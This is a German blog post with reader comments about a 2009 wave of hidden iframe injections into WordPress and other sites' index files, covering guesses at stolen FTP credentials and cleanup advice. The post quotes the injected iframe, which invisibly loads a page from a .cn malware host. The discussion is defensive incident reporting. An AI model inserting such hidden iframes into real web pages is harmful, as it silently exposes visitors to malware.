PepsiXX Hack


Überraschung am Vormittag: Auf einer WordPress Installation fand ich in sämtlichen Unterverzeichnisse die index.php Dateien infiziert mit einem virenverdächtigen iFrame:

iframe src=“http://l o t w a g e r . c n :8080/ts/in.cgi?pepsi56″ width=125 height=125 style=“visibility: hidden“

(besser nicht aufrufen)

Eine kurze Google-Recherche brachte heraus, dass es wohl kein spezifischer WordPress-Fehler ist (oder eine Schwachstelle) sondern das vielmehr auch andere Systeme mit diesem iFrame infirziert wurden. Auffällig dabei ist, dass die Weiterleitung immer auf den Name pepsi + zwei Ziffern lautete.

Die Angriffswelle scheint größeren Ausmaßes zu sein und ist mittlerweile auch im Google-Forum angekommen. Die Liste der (meistens) .cn Domains auf die verwiesen wird ist lang.

Leider habe ich keine Hinweise gefunden, wie genau die Injection vor sich geht bzw. welche Schwachstellen genutzt werden. Da aber eine Vielzahl von Systemen (meist CMS oder Sops) angegriffen wurden scheint es mir nicht an den Systemen selbst zu liegen als vielmehr an einer gemeinsamen Komponente (wie ein Bibliothek oder ein Javascript).

VN:F [1.9.22_1171]
Bewertung: 0.0/10 (0 Bewertungen abgegeben)

15 Kommentare zu "PepsiXX Hack"

  1. Danke für den Hinweis. Könnte mit einer Sicherheitslücke im Adobe Reader auf Windowssystemen zu tun haben. Etwa so: Infiziertes PDF aus dem Web geöffnet -> Javascript ausgeführt -> Trojaner nachgeladen. Der Trojaner schnappt sich FTP Accounts aus FF, Filezilla und anderen Clients und hat freien Zugriff auf die Indexdateien Deiner Webaccounts.

    Quelle: http://modxcms.com/forums/index.php/topic,36412.0.html

    Abhilfe: Javascript im Adobe Reader deaktivieren, Reader updaten, Malwarescan durchführen

    Hoffe, es hilft.

    Gruß Uwe
    der an einem Mac sitzt 😉

  2. Wurde auch das Theme infiziert? War auch die Index auf der Root-Ebene des Blogs betroffen?

  3. ja ausnahmslos alle index.php Dateien (nicht nur vom Blog sondern auch von diversen Nebenscripten) waren betroffen. Unter anderem auch die index.php im amin-Ordner und auch alle Verzeichnisse der Subdomains.

  4. Also auch im Theme? Hast du so eine Index aus dem Theme-Verzeichnis?

  5. ja auch die index.php im theme verzeichnis war betroffen. An letzter Stelle war das oben genannte iFrame eingefügt. EInfach mit <> und Tag vorstellen …

  6. Ok, dann kann ich ja mein AntiVirus für WordPress um diesen Teil anpassen, damit die anderen Blogger bei Injizierung gewarnt werden.

  7. Was ein Glück, dass ich eigentlich nie PDFs aus dem Netz lade, denn wofür braucht man die dort überhaupt, wenn es doch HTML-Seiten gibt.

  8. Stefan, das war doch nur eine Vermutung, wie Dateien infiziert seien könnten. Es gibt zig Möglichkeiten, von den wir wissen, dass sie existieren. Und mindestens doppelt so viele, die unerkannt genutzt werden, um den Code einzuschleusen.

  9. Pdf als Infizierungsgrund kann ich mittlerweile ausschließen. Zum eine habe ich in der letzten Zeit keine pdfs direkt aus dem Internet geladen, darüber hinaus lief bis eben auf alle in Frage kommenden Rechnern ein Virenscan und eine Rootkit Suche. Ohne Ergebnis. Es scheint also eher eine Schwachstelle im Server oder in der Software gewesen zu sein, aktuell habe ich die Javascript_Systeme wie jQuery oder Thickbox im Verdacht.

  10. Ich beschäftige mich ja in letzter Zeit sehr intensiv damit, um mein AntiVirus-Plugin zu erweitern. Es ist schon Hammer-viele Blogs aus dem deutschsprachigen Raum, die betroffen sind. In den meisten Fällen ist es als Aussenseiter schwer rauszufinden, wie die Gefahr tatsächlich eingepflanzt wurde. Deswegen bin ich immer danke für das Feedback und durchforste das Netz nach Opfern mit der Hoffnung, Informationen zu gewinnen und diese im Plugin implementieren.

    So als Fazit kann ich sagen (muss jetzt deinen Fall nicht betreffen): Die meisten Blogger haben einfach viel zu schwache Passwörter gewählt, so dass die Bots durch Ausprobieren schnell drin waren.

    Achso, noch eine Frage meinerseits: Welche WordPress-Version hattest du?

  11. Es lief die 2.7.1

    Das FTP Passwort habe ich gleich mal als erster geändert, die aktuelle Version davon dürfte recht sicher sein. Sollte es daran gelegen haben wäre ich beruhigt – würde ja im Endeffekt heißen, dass es nicht direkt über den Server kam und ein neues starkes PW ist schnell gesetzt 🙂

  12. Bisher hatte ich (Gott sei dank) noch keinen Ärger damit. Gibt es schon neue Infos, worüber die Infektion gekommen ist?

  13. franz wurstsemmel | Juni 17, 2009 um 21:41 |

    leider bin auch ich ein betroffener dieser angriffe. sämtliche index.html dateien von meinen diversen seiten waren betroffen.
    gemein daran ist, dass ein überschreiben mit einer originaldatei nicht viel hilft.
    in kurzer zeit ist die <iframe …. – zeile wieder drin.
    mich würde natürlich interessieren, wie sowas passiert, da ich mir derzeit keinen reim drauf machen kann. es kann doch nicht sein, dass soooooviele ftp-accounts gehackt wurden, oder???

    ich wäre dankbar über zuschriften zum thema.

    vorerst habe ich mir wie folgt geholfen:
    änderung der im iframe-tag angegeben url auf ein auf meiner seite liegendes bild und änderung von hidden auf visible. so sehe ich sofort beim aufruf der seite, ob sie geändert wurde.
    scheint zu nützen. ich vermute mal, dass irgendwie abgefragt wird, ob die seite einen iframe-tag beinhaltet und wenn einer gefunden wird, wird die seite in ruhe gelassen *blauäugig meine meinung*

    aber vielleicht stimmts auch so – nur das einfache hat bestand –

    auf alle fälle – bitte um mitteilung wenns was neues gibt
    haut die hacker

  14. der Virus scheint sich alle im FTP Programm hinterlegten Verbindungen zu schnappen. Diese werden dann von einem externen Programm genutzt um per FTP Zugriff die index Dateien zu infizieren.

    Meine Vorgehensweise:

    – Systemrestore deaktivieren
    – neuste Version von Kaspersky auf den Rechner ziehen
    – System säubern

    Avira hat den Virus nicht finden können 🙁

  15. Nun hab ich mein AntiVirus-Plugin auch um die Möglichkeit erweitert, nach versteckten iFrames in den Templates zu suchen und dies entsprechend visuell und via E-Mail zu melden. Mehr zum Update auf Version 0.3 unter http://playground.ebiene.de/1577/antivirus-wordpress-plugin/#comment-3296

    Danke für deine Erfahrungswerte. Wollen wir hoffen, dass die Lösung für viele Blogger eine Abhilfe schafft.

Hinterlasse einen Kommentar

E-Mail Adresse wird nicht veröffentlicht.


*